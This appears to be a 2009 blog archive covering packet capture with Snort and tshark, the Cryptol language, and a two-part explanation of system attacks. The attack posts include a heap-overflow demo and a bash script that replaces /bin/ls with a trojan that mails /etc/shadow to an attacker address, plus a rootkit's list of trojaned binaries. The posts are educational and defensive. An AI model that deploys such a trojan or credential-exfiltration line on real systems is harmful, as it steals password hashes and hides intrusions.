## Capture and dissect network traffic

1 04 2009

I am currently doing a one-year research project at the University of Minho, in the Distributed Systems group. My job is to find a way to identify specific links between a user and a distributed system. The general idea is to draw a map of the services in a distributed system. This post covers only the first milestone.

The proposal was to build such a system using Snort.

## Snort

Snort is a network intrusion detection system (NIDS), which means that with Snort you can detect malicious activity on your network. It can identify many types of network attacks: DoS and DDoS attacks, port scans, cracking attempts, and much more.

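Snort can operate in two different ways. We can set up Snort to run in passive mode, listening with the network card in promiscuous mode so that it also accepts frames addressed to other machines. On a hub, which repeats every frame to all of its ports, this captures all the traffic of the segment; a switch, on the other hand, normally forwards a frame only to the port of its destination, so we only see other machines' traffic if the switch mirrors it to our port. To do this we only need to connect to the network and start Snort on our machine. Since a passive sniffer does not transmit anything, nobody notices that we are recording all the traffic (including traffic destined for other computers).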

Snort can also run in active mode. "Active" here does not mean that Snort modifies the traffic; it means that Snort is installed at a point in the network, a router for example, where it can gather more information than in passive mode. In this setup it makes sense to use Snort's rule support to filter the traffic it reads.

To do this, Snort captures every packet that crosses the network and interprets each one. Based on the rules we have defined, Snort looks for these patterns in each packet, or in each set of packets, and takes the action associated with each rule.

For example, if a large number of TCP requests reach a particular host on many different ports within a short space of time, we are probably the target of a port scan. A NIDS like Snort knows how to find these patterns and alert the network administrator.
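The port-scan pattern described above can be sketched in C as a sliding-window count of distinct destination ports per source. This is a minimal illustration under stated assumptions, not Snort's own detection code: the `syn_event` record, the `looks_like_port_scan` name and any window or threshold values are hypothetical, and the events are assumed to be sorted by time.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* One observed TCP connection attempt (e.g. a SYN) taken from a capture. */
typedef struct {
    double   time;      /* seconds since the capture started */
    uint32_t src_ip;    /* IPv4 source address */
    uint16_t dst_port;  /* destination TCP port */
} syn_event;

/* Returns true if `src` contacted at least `threshold` distinct destination
 * ports within some interval of `window` seconds. `ev` must be sorted by time. */
bool looks_like_port_scan(const syn_event *ev, size_t n, uint32_t src,
                          double window, unsigned threshold)
{
    unsigned *hits = calloc(65536, sizeof *hits); /* hits per port inside the window */
    if (hits == NULL)
        return false;
    unsigned distinct = 0;   /* number of ports with hits > 0 */
    size_t left = 0;         /* oldest event still inside the window */
    bool scan = false;

    for (size_t right = 0; right < n && !scan; right++) {
        if (ev[right].src_ip != src)
            continue;
        if (hits[ev[right].dst_port]++ == 0)
            distinct++;
        /* Forget events that are now more than `window` seconds old. */
        while (ev[right].time - ev[left].time > window) {
            if (ev[left].src_ip == src && --hits[ev[left].dst_port] == 0)
                distinct--;
            left++;
        }
        if (distinct >= threshold)
            scan = true;
    }
    free(hits);
    return scan;
}
```

Counting distinct ports rather than raw packets is the design choice that matters here: a browser opening many connections to port 80 counts as a single port, while a sweep across ports grows the count quickly.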

## Objective

Our aim was to use Snort to capture all the traffic in passive mode.

```
root@pig:# snort -u snort -g snort -D -d -l /var/log/snort -c /etc/snort/snort.debian.conf -i eth0
```

We save the logs in binary (tcpdump) format in the directory given by `-l`; `-d` makes Snort also record the application-layer data of each packet. I prefer to save all the packets in binary because it is much easier to parse than the tree of files and directories that Snort creates by default.
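To show why a single binary capture is convenient, here is a minimal C sketch that walks the records of a classic libpcap/tcpdump file held in memory. It assumes the little-endian, microsecond-resolution variant (magic number 0xa1b2c3d4 stored as the bytes d4 c3 b2 a1) and does not handle pcapng or byte-swapped files; `pcap_count_packets` is a hypothetical helper name.

```c
#include <stddef.h>
#include <stdint.h>

/* Reads a 32-bit little-endian value. Captures written on little-endian
 * hosts store every header field in this byte order. */
static uint32_t rd32le(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Counts the packet records in an in-memory classic pcap capture.
 * Layout: a 24-byte global header, then per packet a 16-byte record header
 * (ts_sec, ts_usec, incl_len, orig_len) followed by incl_len data bytes.
 * Returns -1 for an unsupported magic number or a truncated record. */
long pcap_count_packets(const uint8_t *buf, size_t len)
{
    if (len < 24 || rd32le(buf) != 0xa1b2c3d4u)
        return -1;
    size_t off = 24;
    long count = 0;
    while (off < len) {
        if (len - off < 16)
            return -1;                          /* truncated record header */
        uint32_t incl_len = rd32le(buf + off + 8);
        off += 16;
        if (len - off < incl_len)
            return -1;                          /* truncated packet data */
        off += incl_len;
        count++;
    }
    return count;
}
```

Every record carries its own length, so a parser can skip from packet to packet without understanding the protocols inside, which is exactly what a per-packet directory tree does not give you.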

I started by looking for a language in which to parse the files created by Snort. I first tried Python, but I only found a tcpdump parser and could not get more than a hexadecimal dump of the tcpdump file.
After that I tried Haskell, and I was amazed!

House is a Haskell operating system developed by the Programatica Project.

It is a system that can serve as a platform for exploring various ideas relating to low-level and system-level programming in a high-level functional language.

And it indeed helped me a lot in my work. This project already provides many parsers for network packets: it implements Ethernet, IPv4, IPv6, TCP, UDP, ICMP and ARP, and I think that is all.

A libpcap (tcpdump file) parser is also already implemented in Haskell, so parsing a complete packet is very simple:

```haskell
import Data.Array (listArray)
import Data.Word (Word8)
-- InPacket, toInPack, doParse and the qualified modules NE, NI4 and NT
-- (Ethernet, IPv4 and TCP packets) come from House's network libraries.

getPacket :: [Word8] -> InPacket
getPacket bytes = toInPack $ listArray (0, Prelude.length bytes - 1) bytes

-- Ethernet | IP | TCP | X
getPacketTCP :: [Word8] -> Maybe (NE.Packet (NI4.Packet (NT.Packet InPacket)))
getPacketTCP bytes = doParse $ getPacket bytes
```

As you can see, it is very easy to get the complete structure of a packet parsed with these libraries. The problem is that they do not implement any application-layer packet parser yet. So, following the protocol stack in that image, this is as deep as we can go with these libraries: very good, but not perfect for me :S

My supervisor told me to start looking for a new tool for this job. I was sad because I could not do everything in Haskell, but I have already promised that I will continue this project in Haskell. You can see the git repo here.

I found tshark, a great tool to dissect and analyze the data inside tcpdump files.

## The power of tshark

tshark is the terminal-based version of Wireshark; with it we can do everything we do with Wireshark.

Show all communications with the IP 192.168.74.242:

```
root@pig:# tshark -R "ip.addr == 192.168.74.242" -r snort.log
...
7750 6079.816123 193.136.19.96 -> 192.168.74.242 SSHv2 Client: Key Exchange Init
7751 6079.816151 192.168.74.242 -> 193.136.19.96 TCP ssh > 51919 [ACK] Seq=37 Ack=825 Win=7424 Len=0 TSV=131877388 TSER=1789588
7752 6079.816528 192.168.74.242 -> 193.136.19.96 SSHv2 Server: Key Exchange Init
7753 6079.817450 193.136.19.96 -> 192.168.74.242 TCP 51919 > ssh [ACK] Seq=825 Ack=741 Win=7264 Len=0 TSV=1789588 TSER=131877389
7754 6079.817649 193.136.19.96 -> 192.168.74.242 SSHv2 Client: Diffie-Hellman GEX Request
7755 6079.820784 192.168.74.242 -> 193.136.19.96 SSHv2 Server: Diffie-Hellman Key Exchange Reply
7756 6079.829495 193.136.19.96 -> 192.168.74.242 SSHv2 Client: Diffie-Hellman GEX Init
7757 6079.857490 192.168.74.242 -> 193.136.19.96 SSHv2 Server: Diffie-Hellman GEX Reply
7758 6079.884000 193.136.19.96 -> 192.168.74.242 SSHv2 Client: New Keys
7759 6079.922576 192.168.74.242 -> 193.136.19.96 TCP ssh > 51919 [ACK] Seq=1613 Ack=1009 Win=8960 Len=0 TSV=131877415 TSER=1789605
...
```
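The filter `ip.addr == 192.168.74.242` used above matches a packet when either its source or its destination address is that IP. A minimal C sketch of roughly that check on a raw Ethernet II frame; `frame_has_ip` is a hypothetical name, and 802.1Q-tagged frames, tunnels and IPv6 are deliberately not handled.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Reads a big-endian (network order) 32-bit value. */
static uint32_t rd32be(const uint8_t *p)
{
    return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 |
           (uint32_t)p[2] << 8  | (uint32_t)p[3];
}

/* True if `frame` is Ethernet II carrying IPv4 and its source or destination
 * address equals `ip` (given in host byte order). */
bool frame_has_ip(const uint8_t *frame, size_t len, uint32_t ip)
{
    if (len < 14 + 20)                       /* Ethernet header + minimal IPv4 header */
        return false;
    uint16_t ethertype = (uint16_t)(frame[12] << 8 | frame[13]);
    if (ethertype != 0x0800)                 /* 0x0800 = IPv4 */
        return false;
    const uint8_t *iph = frame + 14;
    if (iph[0] >> 4 != 4)                    /* IP version field must be 4 */
        return false;
    uint32_t src = rd32be(iph + 12);         /* source address at offset 12 */
    uint32_t dst = rd32be(iph + 16);         /* destination address at offset 16 */
    return src == ip || dst == ip;
}
```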
Show a triple (time, HTTP response code, HTTP content length), separated by ',' and enclosed in double quotes:

```
root@pig:# tshark -r snort.log -R http.response -T fields -E header=y -E separator=',' -E quote=d -e frame.time_relative -e http.response.code -e http.content_length
...
"128.341166000","200","165504"
"128.580181000","200","75332"
"128.711618000","200","1202"
"149.575548000","206","1"
"149.719938000","304",
"149.882290000","404","338"
"150.026474000","404","341"
"150.026686000","404","342"
"150.170295000","304",
"150.313576000","304",
"150.456650000","304",
...
```

Show a 4-tuple (time, source IP, destination IP, TCP payload length):

```
root@pig:# tshark -r snort.log -R "tcp.len>0" -T fields -e frame.time_relative -e ip.src -e ip.dst -e tcp.len
...
551.751252000 193.136.19.96 192.168.74.242 48
551.751377000 192.168.74.242 193.136.19.96 144
551.961545000 193.136.19.96 192.168.74.242 48
551.961715000 192.168.74.242 193.136.19.96 208
552.682260000 193.136.19.96 192.168.74.242 48
552.683955000 192.168.74.242 193.136.19.96 1448
552.683961000 192.168.74.242 193.136.19.96 1448
552.683967000 192.168.74.242 193.136.19.96 512
555.156301000 193.136.19.96 192.168.74.242 48
555.158474000 192.168.74.242 193.136.19.96 1448
555.158481000 192.168.74.242 193.136.19.96 1400
556.021205000 193.136.19.96 192.168.74.242 48
556.021405000 192.168.74.242 193.136.19.96 160
558.874202000 193.136.19.96 192.168.74.242 48
558.876027000 192.168.74.242 193.136.19.96 1448
...
```

Show a triple (source IP, destination IP, destination port):

```
root@pig:# tshark -r snort.log -T fields -e ip.src -e ip.dst -e tcp.dstport
...
192.168.74.242 193.136.19.96 37602
192.168.74.242 193.136.19.96 37602
193.136.19.96 192.168.74.242 22
192.168.74.242 193.136.19.96 37602
193.136.19.96 192.168.74.242 22
193.136.19.96 192.168.74.242 22
192.168.74.242 193.136.19.96 37602
192.168.74.242 193.136.19.96 37602
192.168.74.242 193.136.19.96 37602
193.136.19.96 192.168.74.242 22
193.136.19.96 192.168.74.242 22
193.136.19.96 192.168.74.242 22
193.136.19.96 192.168.74.242 22
192.168.74.242 193.136.19.96 37602
192.168.74.242 193.136.19.96 37602
...
```

## Statistics

Protocol hierarchy:

```
root@pig:# tshark -r snort.log -q -z io,phs
frame frames:7780 bytes:1111485
eth frames:7780 bytes:1111485
ip frames:3992 bytes:848025
tcp frames:3908 bytes:830990
ssh frames:2153 bytes:456686
http frames:55 bytes:19029
http frames:5 bytes:3559
http frames:3 bytes:2781
http frames:2 bytes:2234
http frames:2 bytes:2234
data-text-lines frames:10 bytes:5356
tcp.segments frames:3 bytes:1117
http frames:3 bytes:1117
media frames:3 bytes:1117
udp frames:84 bytes:17035
nbdgm frames:50 bytes:12525
smb frames:50 bytes:12525
mailslot frames:50 bytes:12525
browser frames:50 bytes:12525
dns frames:34 bytes:4510
llc frames:3142 bytes:224934
stp frames:3040 bytes:182400
cdp frames:102 bytes:42534
loop frames:608 bytes:36480
data frames:608 bytes:36480
arp frames:38 bytes:2046
```

### Conversations

We use `-z conv,TYPE,FILTER`, where TYPE can be:

• eth
• tr
• fc
• fddi
• ip
• ipx
• tcp
• udp

and FILTER restricts which packets are counted in the statistics.
```
root@pig:# tshark -r snort.log -q -z conv,ip,tcp.port==80
================================================================================
IPv4 Conversations
Filter:tcp.port==80
                                               |       <-      | |       ->      | |     Total     |
                                               | Frames  Bytes | | Frames  Bytes | | Frames  Bytes |
193.136.19.148   <-> 192.168.74.242              141     13091     202    259651     343    272742
192.168.74.242   <-> 128.31.0.36                  22      6858      28      4784      50     11642
================================================================================
```

### IO

We use `-z io,stat,INT,FILTER,…,FILTER`, where INT is the interval length in seconds. For example, all the traffic except SSH, in 300-second intervals:

```
root@pig:# tshark -r snort.log -q -z io,stat,300,'not (tcp.port=22)'
===================================================================
IO Statistics
Interval: 300.000 secs
Column #0:
                    |   Column #0
Time                |frames|  bytes
000.000-300.000        2161    543979
300.000-600.000        1671    264877
600.000-900.000         508     46224
900.000-1200.000        185     12885
1200.000-1500.000       201     14607
1500.000-1800.000       187     13386
1800.000-2100.000       189     13887
2100.000-2400.000       187     13386
2400.000-2700.000       189     13887
2700.000-3000.000       187     13386
3000.000-3300.000       185     12885
3300.000-3600.000       189     13887
3600.000-3900.000       210     15546
3900.000-4200.000       189     13887
4200.000-4500.000       187     13386
4500.000-4800.000       185     12885
4800.000-5100.000       189     13887
===================================================================
```

## Conclusion

With tshark we can find out everything we want to know about what is inside a network packet. The trick is to understand the statistics that tshark generates, and to know how to ask for them. My next step is to set up a machine running Snort in active mode and to start understanding how to use Snort for all of this information collection.

If you are interested and understand Portuguese, see the presentation:

## Cryptol the language of cryptography

1 04 2009

Pedro Pereira and I are working on a new project in our Master's programme. The second half of the Master's consists of a single project proposed by a company. Some companies have partnerships with the Master's in formal methods, including Critical Software, SIG and Galois.
We chose Galois because we also work in the area of cryptography and we already knew the work of some people from this company. The project proposed by Galois was to study Cryptol as a language for specifying cryptographic algorithms. The cipher we used for this study is SNOW 3G (The SNOW website); later on I will talk about the specification of this cipher. In this post I only want to show you some details of the language.

This post is not intended to be an exhaustive explanation of Cryptol; if you are looking for that, you can go directly to the manuals. It only relates my experience, and what I like most about the language.

## Overview

Cryptol is a high-level language geared towards low-level problems. It is a domain-specific language for designing and implementing cryptographic algorithms.

Cryptol helps a lot in getting the implementation of a cipher right: its type system, with type inference over sequence sizes, catches many mistakes at compile time, so a large part of the correctness checking is done by the language itself. Correctness also benefits from the language being functional: there are no side effects, and a function only returns a value in its codomain.

In Cryptol, the philosophy is that everything is a sequence. This is very useful because we are working with low-level data (arrays of bits), which we represent as sequences. Sequences can be nested to give the data more structure: for example, we can simply transform a 32-bit sequence into a sequence of four 1-byte sequences. Sequences can be finite or infinite, as we are going to see later in this post. Because Cryptol is a high-level language, we can also write polymorphic functions; most of the primitive functions are polymorphic.
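For comparison, here is the 32-bit to four-byte reshaping mentioned above written by hand in C, a minimal sketch with hypothetical helper names `split32` and `join32`. The big-endian byte order used here is an assumption of the sketch and is not necessarily the element order Cryptol uses; the point is that in C the reshaping is a loop of shifts and masks, while in Cryptol it is a single `split` or `join` whose effect is visible in its type.

```c
#include <stdint.h>

/* Splits a 32-bit word into four bytes, most significant byte first. */
void split32(uint32_t w, uint8_t out[4])
{
    for (int i = 0; i < 4; i++)
        out[i] = (uint8_t)(w >> (24 - 8 * i));
}

/* Joins four bytes (most significant first) back into a 32-bit word. */
uint32_t join32(const uint8_t in[4])
{
    uint32_t w = 0;
    for (int i = 0; i < 4; i++)
        w = w << 8 | in[i];
    return w;
}
```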
We navigate through sequences with recursion or sequence comprehensions, and with these two techniques we can implement recurrences. If you are a Haskell programmer, you just need the next section to learn Cryptol. The language looks so much like Haskell that even the philosophy seems to have a lot in common.

## Types in Cryptol

The type $[32]$ means a sequence of 32 bits. All the types in Cryptol are size oriented. The unit is the $Bit$, which you can use to represent $Bool$. To represent an infinite sequence we use the reserved word $inf$ and write $[inf]$. To generate an infinite sequence, we use the syntactic sugar for sequences, like this: $[1~..]$. Cryptol will infer the type of this sequence as

$[1~..]~:~[inf][1]$

That means this sequence has infinitely many positions of 1-bit words. The type inference mechanism always picks the smallest size it needs to represent the information. So it infers the type of $[100~..]$ as

$[100~..]~:~[inf][7]$

because it "knows" that it needs only 7 bits to represent the decimal $100$. If you need more, you can force the type of your function.

Polymorphism shows up in the types. If we have

$f~:~[a]b~\rightarrow~[a]b$

this means that the function $f$ is polymorphic over $b$: its domain is a sequence of $a$ elements of type $b$, and so is its codomain. We could also have

$f~:~[a][b]c$

meaning that $f$ is a constant: a sequence of $a$ elements, each of which is a sequence of $b$ elements of type $c$.

So, let's talk about some primitive functions in Cryptol and their types. The $tail$ function has the following type:

$tail~:~\{a~b\}~[a+1]b~\rightarrow~[a]b$

As we can see, Cryptol is so size oriented that we can use arithmetic operators in types. We can probably infer what this function does just from its type: for all $a$ and $b$, given a sequence of size $a+1$ of elements of type $b$, $tail$ returns a sequence of size $a$ of the same type.
In fact, this function removes the first element of a sequence. Because of this size-oriented philosophy, the behaviour of many functions that change the size of sequences can be read just from their types, as you can see in the following list of Cryptol primitive functions:

$drop~:~\{ a~b~c \}~( fin~a ,~a~\geq~0)~\Rightarrow~(a ,[ a + b ]~c )~\rightarrow~[ b ]~c$

$take~:~\{ a~b~c \}~( fin~a ,~b~\geq~0)~\Rightarrow~(a ,[ a + b ]~c )~\rightarrow~[ a ]~c$

$join~:~\{ a~b~c \}~[ a ][ b ] c~\rightarrow~[ a * b ]~c$

$split~:~\{ a~b~c \}~[ a * b ] c~\rightarrow~[ a ][ b ]~c$

$tail~:~\{ a~b \}~[ a +1] b~\rightarrow~[ a ]~b$

## Recursion and Recurrence

Cryptol supports recursion, just like many functional languages do. Take the Fibonacci function definition: its implementation in Cryptol is exactly the same as its mathematical definition.

```
fib : [32] -> [32];
fib n = if n == 0 then 0 else if n == 1 then 1 else fib (n-1) + fib (n-2);
```

Cryptol uses recursion to let us iterate through sequences. But, if you prefer, you can write a more functional version of the Fibonacci function in Cryptol:

```
fib : [32] -> [32];
fib n = fibs @ n;
  where {
    fibs : [inf][32];
    fibs = [0 1] # [| x + y || x <- drop (1,fibs) || y <- fibs |];
  };
```

Here we define an infinite list $fibs$ of all the Fibonacci numbers by referring to $fibs$ inside its own sequence comprehension. This is called a recurrence, and you can use it in Cryptol too.

## Cryptol vs C

I'm going to show you part of the implementation of SNOW 3G in Cryptol and in C. This is a function called $MUL_{\alpha}$:

```
MULa : [8] -> [32];
MULa(c) = join ( reverse [
    ( MULxPOW(c, 23 :[32], 0xA9) )
    ( MULxPOW(c, 245:[32], 0xA9) )
    ( MULxPOW(c, 48 :[32], 0xA9) )
    ( MULxPOW(c, 239:[32], 0xA9) )
  ] );
```

```c
/* The function MUL alpha.
   Input c: 8-bit input.
   Output : 32-bit output.
   See section 3.4.2 for details.
*/
u32 MULalpha(u8 c)
{
    return ((((u32)MULxPOW(c, 23,  0xa9)) << 24) |
            (((u32)MULxPOW(c, 245, 0xa9)) << 16) |
            (((u32)MULxPOW(c, 48,  0xa9)) <<  8) |
            (((u32)MULxPOW(c, 239, 0xa9))));
}
```

In Cryptol we just say that we want to work with a 32-bit word, and we don't need to shift the parts of the word: we just join them together. We reverse the sequence because Cryptol stores words in little-endian order, and we want to keep the definition close to the specification. This is a very simple function, so the C version is not that different. But for a more complex function, writing it in C would start to become a nightmare.

## Conclusion

Well, the conclusion is that Cryptol is a language that really helps to write low-level algorithms. With Cryptol the specification is formal and easier to read than in other languages. Another advantage of Cryptol is that the code can be converted to other languages, such as VHDL and C. If you're interested, take a look at the presentation that we gave.

## References

## Tracing the attack – Part II

22 01 2009

## Intro

This post is the continuation of Tracing the attack – Part I, and it is the last one of the series. Here I'm going to talk about heap/BSS overflows and rootkits.

## Heap

On the stack, memory is allocated by the kernel (as explained in Part I). The heap, on the other hand, is a structure where the program can allocate memory dynamically, with the malloc(), realloc() and calloc() functions.

## BSS segment

BSS stands for Block Started by Symbol and is used by compilers to store static variables. These variables are filled with zero-valued data at the start of the program. In the C programming language, all variables with static storage duration (global variables and variables declared `static`) that are not explicitly initialized are placed in the BSS segment.
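A small C sketch of the zero-initialization rule above. The objects below have static storage duration and no initializer, so C guarantees that they start at zero, and a typical ELF toolchain places them in `.bss`. The variable and function names are illustrative only.

```c
#include <stddef.h>

/* No initializers: C guarantees these start as zero; compilers usually
 * place them in the .bss segment rather than storing zeros in the file. */
static int  counter;        /* file-scope static */
static char buffer[64];     /* the whole array starts zeroed */
int         global_total;   /* external linkage, also zeroed */

/* Returns 1 if every byte of `buffer` is still zero. */
int buffer_is_zeroed(void)
{
    for (size_t i = 0; i < sizeof buffer; i++)
        if (buffer[i] != 0)
            return 0;
    return 1;
}

/* Sum of two uninitialized statics: 0 until something writes to them. */
int read_counters(void)
{
    return counter + global_total;
}

/* A block-scope static also has static storage: it starts at 0 and keeps
 * its value between calls. */
int next_id(void)
{
    static int id;
    return ++id;
}
```

Compiling this with gcc and running `nm` on the object file typically lists `counter` and `buffer` with symbol type `b`, the marker for a local BSS symbol.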
## Heap/BSS Overflow

Here is a simple example, taken from the w00w00 article, that demonstrates a heap overflow:

```c
/* demonstrates dynamic overflow in heap (initialized data) */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>   /* u_long, u_int */

#define BUFSIZE 16
#define OVERSIZE 8 /* overflow buf2 by OVERSIZE bytes */

int main()
{
    u_long diff;
    char *buf1 = (char *)malloc(BUFSIZE), *buf2 = (char *)malloc(BUFSIZE);

    diff = (u_long)buf2 - (u_long)buf1;
    printf("buf1 = %p, buf2 = %p, diff = 0x%lx bytes\n", (void *)buf1, (void *)buf2, diff);

    memset(buf2, 'A', BUFSIZE-1), buf2[BUFSIZE-1] = '\0';

    printf("before overflow: buf2 = %s\n", buf2);
    memset(buf1, 'B', (u_int)(diff + OVERSIZE));   /* writes past the end of buf1 */
    printf("after overflow: buf2 = %s\n", buf2);

    return 0;
}
```

When we run it (OVERSIZE is 8, so 8 bytes of buf2 get overwritten):

```
[root /w00w00/heap/examples/basic]# ./heap1 8
buf1 = 0x804e000, buf2 = 0x804eff0, diff = 0xff0 bytes
before overflow: buf2 = AAAAAAAAAAAAAAA
after overflow: buf2 = BBBBBBBBAAAAAAA
```

This works because buf1 overruns its boundary and writes data into buf2's heap space. The program doesn't crash because buf2's heap space is still a valid segment. To see a BSS overflow, we just have to replace `char *buf = malloc(BUFSIZE)` with `static char buf[BUFSIZE]`.

A non-executable heap prevents code injected there from being executed, but it does not prevent heap overflows themselves. I won't go further into this subject in this post; if you want to learn more, see the w00w00 article and the other links in the references section (at the end of this post).

## Rootkits

After gaining access to the target machine (using an exploit, for example), the attacker must make sure they will keep that access even after the victim has fixed the vulnerability, and without the victim knowing that the system remains compromised. The attacker can achieve this by installing a rootkit on the target machine. A rootkit is basically a set of tools (backdoors and trojan horses) designed to provide absolute control of the target machine.
A backdoor is a way of bypassing the normal authentication of a machine, providing remote access to it while trying to remain undetected. For example, it can take the form of a program or of a change to a program that is already installed.

A trojan horse (or just *trojan*) is usually a program that supposedly performs one function but actually also performs other malicious functions without the victim's knowledge. Below is a very simple example of a bash script that creates a possible trojaned ls:

```bash
#!/bin/bash
mv /bin/ls /bin/ls.old
/bin/echo "cat /etc/shadow | mail attacker@domain.com" > /bin/ls
/bin/echo "/bin/ls.old" >> /bin/ls
chmod +x /bin/ls
```

Obviously we are not considering the fact that ls can receive arguments; this is just for example purposes, and it shows the objective of a trojan well. A real rootkit usually installs modified versions of several binaries (lsof, ps, etc.). The idea of changing these programs is to hide the trojan itself: with a modified ps command, the user cannot see the trojan process running. Here is a list of the programs changed when you install Linux Rootkit 4:

```
bindshell    port/shell type daemon!
chfn         Trojaned! User > r00t
chsh         Trojaned! User > r00t
crontab      Trojaned! Hidden Crontab Entries
du           Trojaned! Hide files
find         Trojaned! Hide files
fix          File fixer!
ifconfig     Trojaned! Hide sniffing
inetd        Trojaned! Remote access
killall      Trojaned! Wont kill hidden processes
linsniffer   Packet sniffer!
login        Trojaned! Remote access
ls           Trojaned! Hide files
netstat      Trojaned! Hide connections
passwd       Trojaned! User > r00t
pidof        Trojaned! Hide processes
ps           Trojaned! Hide processes
rshd         Trojaned! Remote access
sniffchk     Program to check if sniffer is up and running
syslogd      Trojaned! Hide logs
tcpd         Trojaned! Hide connections, avoid denies
top          Trojaned! Hide processes
wted         wtmp/utmp editor!
z2           Zap2 utmp/wtmp/lastlog eraser!
```

There are many rootkits around the Internet; the most common ones compromise Windows and Unix systems.
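The trojaned binaries listed above replace files that normally never change, so one classic way to notice them is to record a hash of each binary while the system is known to be clean and compare it later. A minimal C sketch of that idea, with hypothetical helpers `fnv1a64`, `fnv1a64_file` and `matches_baseline`. FNV-1a is used only to keep the example short; it is not a cryptographic hash, so a real checker should use something like SHA-256 and keep its baseline on read-only or offline media. A rootkit running inside the kernel can also lie to any program reading files through it, so such a check is most trustworthy when run from clean boot media.

```c
#include <stdint.h>
#include <stdio.h>

#define FNV64_OFFSET 0xcbf29ce484222325ULL
#define FNV64_PRIME  0x100000001b3ULL

/* Feeds `len` bytes into a running 64-bit FNV-1a state `h`. */
static uint64_t fnv1a64_update(uint64_t h, const unsigned char *p, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        h ^= p[i];
        h *= FNV64_PRIME;
    }
    return h;
}

/* FNV-1a hash of a memory buffer. */
uint64_t fnv1a64(const void *data, size_t len)
{
    return fnv1a64_update(FNV64_OFFSET, data, len);
}

/* Hashes a whole file; returns 0 on success, -1 if it cannot be read. */
int fnv1a64_file(const char *path, uint64_t *out)
{
    FILE *f = fopen(path, "rb");
    if (f == NULL)
        return -1;
    uint64_t h = FNV64_OFFSET;
    unsigned char buf[4096];
    size_t n;
    while ((n = fread(buf, 1, sizeof buf, f)) > 0)
        h = fnv1a64_update(h, buf, n);
    int failed = ferror(f);
    fclose(f);
    if (failed)
        return -1;
    *out = h;
    return 0;
}

/* 1: file matches the recorded baseline hash, 0: it changed, -1: unreadable. */
int matches_baseline(const char *path, uint64_t baseline)
{
    uint64_t h;
    if (fnv1a64_file(path, &h) != 0)
        return -1;
    return h == baseline;
}
```

For example, call `fnv1a64_file("/bin/ls", &h)` once on a clean system and store `h`; after the trojaned ls script above has run, `matches_baseline("/bin/ls", h)` would return 0.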
## Detecting and removing rootkits

When someone suspects that their system has been compromised, the best thing to do is to use a tool to detect and remove rootkits. For Linux we have chkrootkit and rkhunter, and for Windows you can use RootkitRevealer. As a curiosity, I would like to mention that in 2005 Sony BMG put a rootkit on several music CDs that installed itself (without notice) on the computers where the CDs were played (for more about this).

## Outroduction

As we saw, an attacker starts by using a scanner against a particular range of IPs, then checks which services are available, and then runs a dictionary attack in the victim's language, inferred from the IP address. Alternatively, the attacker may find vulnerabilities in the system that can be used to gain access. After gaining access to the computer, the attacker finishes by installing a rootkit to keep permanent access to the system.

As a bonus, I also explained some minimalistic examples of how someone who has local access to a system can gain root access to it by exploiting programs running on that system. This area is so vast that it is still impossible to predict all the ways an attack can be carried out. Imagine that an attacker gains access to a computer but doesn't have root credentials: the attacker will probably try to exploit some of the programs running on that system…

## References

## Tracing the attack – Part I

21 01 2009

## Intro

In this post I will talk about some of the techniques used to attack systems, and some solutions that can greatly reduce the number of attacks a system may suffer: a view of the attack from the initial scan to gaining root on a system. This work is a continuation of my work on honeypots. The attacks presented here could be seen in a high-interaction honeypot, that is, real systems with known vulnerabilities. Unfortunately, in previous posts I used a low-interaction honeypot, which only emulates vulnerabilities, so I could not identify some of the attacks mentioned here.
This post continues in Part II.

## Starting

First, let me talk about the profile of the main threat we face from the moment we use the Internet: the Script Kiddie. A Script Kiddie does not care who they are attacking; their only purpose is to gain root access on a machine. The problem is that they have several tools that automate the whole process, and usually the only thing they have to do is point the tool at the entire Internet. Sooner or later they are guaranteed to get access to some machine. Because these tools are increasingly well known and are combined with random searches, this threat is extremely dangerous: it is not a question of "if" but of "when" we will be the target of a scan.

I introduced the "who"; now let me introduce the "how". Before starting any type of attack, the enemy must find which machines are online and which of their ports (services) are open to the outside. This technique is called Port Scanning.

## Port Scanning

Port Scanning is used both by system administrators and by attackers: the former to assess the security of their machines, the latter to find vulnerabilities, as I said before. I will give special focus to this technique because mastering it is essential in both situations.

Basically, a port scan sends a message to each port of a machine and, depending on the kind of response it gets, determines the state of the port. The possible port states are:

• Open or Accepted: the machine sent a response indicating that a service is listening on the port
• Closed, Denied or Not Listening: the machine sent a response indicating that any connection to the port will be denied
• Filtered, Dropped or Blocked: there was no response from the machine

A note on the legality of this technique: Port Scanning can be seen as ringing a doorbell to check whether someone is home. Usually, nobody can be accused of anything just for doing a port scan.
But if we keep ringing the bell constantly, the activity could be compared to a denial of service (for more about legal issues related to Port Scanning). Now we are ready to see the most popular Port Scanning techniques.

## TCP SYN scan

The SYN scan is the most popular because it can be done very quickly, scanning thousands of ports per second on a fast network without firewalls. This kind of scan is relatively discreet because it never completes TCP connections. It also distinguishes clearly and reliably between port states.

This technique is also known as half-open scan because it never opens a full TCP connection. A SYN packet (the beginning of a normal connection) is sent and the scanner waits for an answer. If it receives a SYN/ACK, the port is Open; if it receives a RST, the port is Closed; and if there is no response after several retransmissions of the SYN, the port is marked as Filtered. The port is also marked as Filtered if an ICMP Unreachable error is received.

Normal scenario (the client sends a SYN, the server replies with a SYN/ACK, and the client sends an ACK):

TCP SYN scan (the client sends a SYN, the server replies with a SYN/ACK, and the client never completes the handshake with an ACK):

## TCP connect scan

This technique is used when the user does not have privileges to create raw packets (in nmap, for example, you need root privileges for the SYN scan option). Rather than sending custom packets, as all the other techniques mentioned here do, it establishes a complete TCP connection with the target machine's port. This takes considerably longer to obtain the same information as the previous technique, because more packets are exchanged. In addition, since it is neither quick nor silent, the target system often logs these connections; on Unix, for example, an entry is added to syslog.

## UDP scan

A UDP scan is much slower than a TCP one, which is one of the reasons why many system administrators ignore the security of these ports; attackers do not.
This technique consists of sending an empty UDP header (no data) to every target port. If an ICMP Unreachable error is returned, the port state (Closed or Filtered) is determined by the type and code of the error. If a UDP packet comes back, the port is Open; if no response is received after the retransmissions, the port is classified as Open|Filtered, because it may be in either state.

